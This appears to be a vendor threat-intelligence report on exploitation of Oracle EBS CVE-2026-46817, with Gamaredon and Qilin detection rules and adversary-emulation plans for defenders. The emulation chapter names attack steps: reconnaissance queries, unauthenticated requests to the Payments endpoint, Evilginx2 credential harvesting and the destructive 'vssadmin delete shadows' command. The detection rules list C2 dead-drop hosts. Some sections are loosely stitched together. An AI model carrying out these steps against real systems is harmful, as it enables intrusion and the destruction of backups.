Inferlume

How it Works

Reports

Pricing

About

Get Free Access →

Get Free Access

Last Updated On

Tuesday, June 30, 2026

CCTTII--22002266--00663300

IInnffoorrmmaattiioonnaall

AAccttiivvee EExxppllooiittaattiioonn CCoonnffiirrmmeedd

Enterprise Gateways Under Siege From Ransomware Teams And Nation State Actors

Oracle EBS CVE-2026-46817 with a critical CVSS score of 9.8 is undergoing active exploitation by unconfirmed threat actors. Attackers use unauthenticated network access to fully compromise the internal File Transmission architecture of Oracle Payments. Remediation patches have been available since the May updates but exploitation activity has surged without public exploit code. Organizations must immediately identify exposed assets running versions 12.2.3 through 12.2.15 to apply security updates or isolate systems from external access.

9.8

CVSS Score

IOC Count

Source Count

Confidence Score

CVEs

CVE-2026-46817

Actors

Gamaredon, Qilin, ShinyHunters

Sectors

Finance, ERP, Higher Education, Government, Military, Healthcare, Critical Infrastructure

Regions

Global, Ukraine, United States

Chapter 01 - Executive Overview

CVE-2026-46817 represents a critical authentication and privilege management flaw within the File Transmission component of Oracle Payments affecting E-Business Suite versions 12.2.3 through 12.2.15. Security analysts at Defused Cyber observed active real-world exploitation against threat honeypots over the weekend of June 28 and 29 2026 which demonstrates that operational weaponization has occurred despite the total absence of public exploit code. Because the flaw allows an unauthenticated remote adversary with network access to fully compromise the payment framework without any user interaction organizations face an acute risk of complete system takeover data exfiltration and fraudulent financial transaction manipulation. The business impact is severe as unpatched internet-exposed ERP applications are targeted opportunistically mimicking the extensive 2025 extortion campaigns orchestrated by Cl0p-linked groups against similar framework vulnerabilities.

Chapter 02 - Threat & Exposure Analysis

The vulnerability is rooted in an authentication and privilege management flaw within the File Transmission component of Oracle Payments which allows an adversary to gain complete control over the system via automated network scans without needing valid credentials or user engagement. Industry data reveals a distinct trend where sophisticated actors rapidly operationalize critical Oracle enterprise vulnerabilities as seen in previous campaigns targeting CVE-2025-61882 and CVE-2026-35273. While the current honeypot exploitation remains under attribution due to a lack of specific digital signatures historical context points to a strong likelihood of engagement by financially motivated cybercrime syndicates.

Chapter 03 - Operational Response

Identify all active enterprise deployments of Oracle E-Business Suite running versions 12.2.3 through 12.2.15 and check if the Oracle Payments framework is exposed.
Apply the comprehensive May 2026 Critical Security Patch Update issued by the vendor across all production and non-production instances immediately.
Restrict or firewall all external internet-facing access to Oracle Payments endpoints to limit exposure until patch verification is complete.
Review perimeter web server access logs retrospectively for anomalous unauthenticated HTTP requests targeting the payment URI pathways during the June 28 and June 29 window.
Establish formal monitoring mechanisms by subscribing to specialized intelligence feeds to track the potential emergence of public exploit code.

Phase	Action	Timeframe
Phase One	Conduct asset inventory and verify patch state for Oracle E-Business Suite	Immediate
Phase Two	Apply official vendor patches to all internet-exposed systems	4 Hours
Phase Three	Audit security information log repositories for historical honeypot-window activity	24 Hours
Phase Four	Finalize internal instance remediation and execute network segmentation controls	72 Hours

2025 Campaign Period: Legitimate consulted sources track the initiation of extensive cyberespionage activities, marking the baseline period for the targeted collection and tooling evolution.
May 31, 2026: Security tracking documentation isolates foundational elements of the adversary deployment infrastructure and primary delivery methodologies.
June 28, 2026: Field observation networks capture the weaponization of legacy execution vectors across multiple geographic routing points.
June 29, 2026: Formal publication of technical research details thirty-five distinct spearphishing campaigns, six custom PowerShell tools, and fifteen abused cloud services.

Chapter 04 - Detection Intelligence

Gamaredon execution chains initiate with targeted spearphishing campaigns delivering malicious archive attachments or weaponized XHTML files configured for HTML smuggling. This activity facilitates the dropping of malicious HTA downloaders to establish a foothold. The threat actors weaponize CVE-2025-8088 to bypass default protections and place the HTA downloader directly into the core startup folder location %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup which guarantees automated execution during the next system login sequence. Lateral movement within the compromised infrastructure relies heavily on automated scripts replacing legitimate link files on connected network shares and portable flash storage. The deployment of custom installers targets known software packages on removable media by embedding automated download components within nested compressed files. All six newly documented custom modules operate exclusively through direct execution paths in active memory blocks to completely bypass standard host based file detection solutions.

Dead Drop Resolver Services (abused legitimate platforms):

telegra.ph (C2 dead drop — PteroOdd)
gofile.io (C2 resolution — PteroEffigy)
dev.to (C2 dead drop)
mastodon.social / federated instances (dead drop)
dropbox.com (exfiltration / dead drop)
wasabi.com (cloud storage exfiltration)
tebi.io (cloud storage)
rentry.co (paste service dead drop)
write.as (paste service)
lesma.eu (paste)
nopaste.net (paste)
paste.ee (paste)
intercolo.net (tunnel)
teletype.in (dead drop)

Malware Family Tags:
PteroSand, PteroLNK, PteroPaste, PteroDee, PteroCache, PteroDum, PteroOdd, PteroEffigy, PteroSetup

CVE Weaponized:
CVE-2025-8088 (WinRAR)

title: Gamaredon HTA Dropped in Windows Startup Folder (CVE-2025-8088 / PteroSand)
status: experimental
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\Start Menu\Programs\Startup\'
    TargetFilename|endswith:
      - '.hta'
      - '.lnk'
      - '.vbs'
    Image|endswith:
      - '\winrar.exe'
      - '\7z.exe'
      - '\wscript.exe'
      - '\mshta.exe'
  condition: selection
falsepositives:
  - Legitimate enterprise startup scripts (verify against inventory)
level: high
tags:
  - attack.persistence
  - attack.t1547.001
  - gamaredon

title: Gamaredon Dead Drop C2 — Outbound to Paste/Cloud Services from Scripting Engine
status: experimental
logsource:
  category: network_connection
  product: windows
detection:
  selection_process:
    Image|endswith:
      - '\powershell.exe'
      - '\wscript.exe'
      - '\mshta.exe'
      - '\cscript.exe'
  selection_dest:
    DestinationHostname|contains:
      - 'telegra.ph'
      - 'gofile.io'
      - 'rentry.co'
      - 'write.as'
      - 'nopaste.net'
      - 'paste.ee'
      - 'dev.to'
      - 'lesma.eu'
  condition: selection_process and selection_dest
falsepositives:
  - Developer tooling, legitimate PowerShell automation
level: high
tags:
  - attack.command_and_control
  - attack.t1102
  - gamaredon

index=wineventlog EventCode=4104
| where match(ScriptBlockText, "(?i)(telegra\.ph|gofile\.io|rentry\.co|write\.as|nopaste\.net)")
| eval severity="HIGH"
| stats count by ComputerName, UserName, ScriptBlockText
| sort -count

rule Gamaredon_PteroFamily_InMemory_PS_Loader {
    meta:
        description = "Detects Gamaredon Ptero* PowerShell in-memory loader patterns"
        actor = "Gamaredon / UAC-0010"
        confidence = "medium"
    strings:
        $ptero1 = "PteroDee" ascii nocase
        $ptero2 = "PteroCache" ascii nocase
        $ptero3 = "PteroDum" ascii nocase
        $ptero4 = "PteroOdd" ascii nocase
        $ptero5 = "PteroEffigy" ascii nocase
        $ptero6 = "PteroPaste" ascii nocase
        $iex = "IEX" ascii nocase
        $bypass = "-EncodedCommand" ascii nocase
        $reflective = "[System.Reflection.Assembly]::Load" ascii
    condition:
        (any of ($ptero*)) or
        ($iex and ($bypass or $reflective) and 1 of ($ptero*))
}

title: Check Point VPN CVE-2026-50751 — Unauthenticated IKEv1 Session Established
status: experimental
logsource:
  product: checkpoint
  service: vpn
detection:
  selection:
    event_type: 'VPN session established'
    auth_method: 'certificate'
    ike_version: 'IKEv1'
    user: '-'
  condition: selection
falsepositives:
  - Service accounts with certificate auth (verify against whitelist)
level: critical
tags:
  - attack.initial_access
  - attack.t1133
  - cve.2026-50751

title: Qilin Pre-Encryption Data Staging via Unauthorized RMM
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\anydesk.exe'
      - '\ScreenConnect.ClientService.exe'
      - '\splashtop.exe'
      - '\teamviewer.exe'
  filter_legit:
    ParentImage|endswith:
      - '\services.exe'
  condition: selection and not filter_legit
falsepositives:
  - Legitimate IT remote support (correlate with change tickets)
level: high
tags:
  - attack.command_and_control
  - attack.t1219
  - qilin

title: Qilin Ransomware — VSS Shadow Copy Deletion
status: stable
logsource:
  category: process_creation
  product: windows
detection:
  selection_vssadmin:
    CommandLine|contains:
      - 'vssadmin delete shadows'
      - 'vssadmin resize shadowstorage'
  selection_wmic:
    CommandLine|contains: 'wmic shadowcopy delete'
  selection_pwsh:
    CommandLine|contains:
      - 'Get-WmiObject Win32_ShadowCopy'
      - '.Delete()'
  condition: 1 of selection_*
level: critical
tags:
  - attack.impact
  - attack.t1490
  - qilin

Technique ID	Name	Evidence Basis
T1566.001	Spearphishing Attachment	Documented campaigns distributing malicious archive files and XHTML email lures
T1027.006	HTML Smuggling	Integration of XHTML files hosting smuggled downloader components
T1059.001	PowerShell	Operational usage of six newly discovered functional script tools running in memory
T1091	Replication Through Removable Media	Automated modification and tracking of connected USB files via link weaponization
T1102	Web Service as C2	Documented mapping of fifteen public hosting and data platforms as resolver addresses
T1036	Masquerading	Replacing reliable installer executables on media drives with custom multi-stage archives
T1547.001	Boot or Logon Autostart: Registry Run Keys or Startup Folder	Exploitation of storage flaws to drop files into the automated startup directories
T1041	Exfiltration Over C2 Channel	Transmitting internal network data assets to public repository cloud providers

Chapter 05 - Governance, Risk & Compliance

The state-sponsored nature of this adversary operating within an active conflict zone elevates the risk profile beyond typical cybercrime and demands strict alignment with national defense threat frameworks.
Organizations operating within the European Union that support critical infrastructure or maintain cross-border operations must evaluate these targeted spearphishing campaigns under the strict incident reporting mandates of the NIS2 directive for significant security incidents.
The distinct government-employee operational calendar pattern identified by tracking teams provides a predictable threat intelligence schedule that allows security operations centers to optimize analyst shift scheduling around foreign federal holidays.
Enterprise risk management teams must review third-party access control policies regarding outbound traffic from internal scripting engines to public hosting and communication platforms due to the systematic abuse of ubiquitous cloud utilities.

Chapter 06 - Adversary Emulation

Adversary Emulation: CVE-2026-46817 Oracle Payments Unauthenticated Takeover
Objective: Validate detection and response controls against unauthenticated HTTP exploitation of Oracle EBS Payments.
Step 1 — Reconnaissance
  - Shodan/Censys query: product:"Oracle E-Business Suite" http.title:"Oracle Applications"
  - Identify exposed instances running 12.2.3–12.2.15
Step 2 — Exploitation (Lab/Authorized Only)
  - Target: Oracle EBS 12.2.x lab instance (no production)
  - Craft unauthenticated POST to /oracle/apps/pay/fileTransmission endpoint
  - Observe: HTTP 200/302 without Authorization header → indicator of vulnerable path
  - Note: No public PoC exists; use patch diff analysis or synthetic request fuzzing
Step 3 — Post-Exploitation
  - Attempt Oracle Payments system takeover via improper privilege escalation
  - Validate lateral movement opportunity to Oracle database backend
Step 4 — Detection Validation
  - Confirm SIEM/SIGMA rule fires on unauthenticated request
  - Confirm WAF blocks or alerts on Oracle-specific URI patterns without auth header
MITRE Coverage Tested: T1190, T1078

Adversary Emulation: Gamaredon / UAC-0010 Spearphishing + USB + Cloud C2
Objective: Test detection depth against Gamaredon TTPs.
Step 1 — Initial Access Simulation
  - Craft XHTML attachment with embedded HTML smuggling delivering benign HTA file
  - Send via internal phishing simulation platform to target group (Ukrainian-language lure optional)
  - Validate: Email gateway sandbox detects/quarantines HTA?
Step 2 — Persistence Simulation
  - Drop benign .hta file into C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
  - Log on and off to trigger execution
  - Validate: Sysmon Event ID 11 fires? SIGMA rule triggers in SIEM?
Step 3 — Cloud Dead Drop C2 Simulation
  - From PowerShell, issue HTTP GET to telegra.ph and gofile.io
  - Validate: Network detection rule fires? SIEM alert triggers on PS→dead-drop connection?
Step 4 — USB Weaponization Simulation
  - Create test LNK file on USB that calls back to test C2
  - Insert USB on test endpoint
  - Validate: USB device control blocks execution? EDR behavioral alert fires?
MITRE Coverage Tested: T1566.001, T1027.006, T1059.001, T1091, T1102, T1547.001

Adversary Emulation: Qilin via Check Point VPN CVE-2026-50751
Objective: Test detection depth against Qilin TTPs.
Step 1 — Initial Access Simulation
  - Identify Check Point VPN deployment with IKEv1 enabled (lab environment only)
  - Attempt unauthenticated certificate bypass against IKEv1 endpoint
  - Validate: Does SIEM alert on unauthenticated IKEv1 session?
Step 2 — Post-Access Lateral Movement
  - Simulate credential harvesting via AiTM proxy (Evilginx2 in lab)
  - Deploy RMM tool (AnyDesk) from compromised foothold without IT change record
  - Validate: RMM detection SIGMA fires?
Step 3 — Impact Simulation
  - Execute: vssadmin delete shadows /all /quiet (on test VM)
  - Validate: VSS deletion SIGMA alert triggers?
  - Attempt Veeam service account enumeration
MITRE Coverage Tested: T1190, T1133, T1219, T1490, T1486

Intelligence Confidence72%

72/100 based on an assessment where the vulnerability assignment is fully validated via the National Vulnerability Database but deductions are applied due to a single source confirming honeypot exploitation alongside an absence of concrete network indicators or definitive actor attribution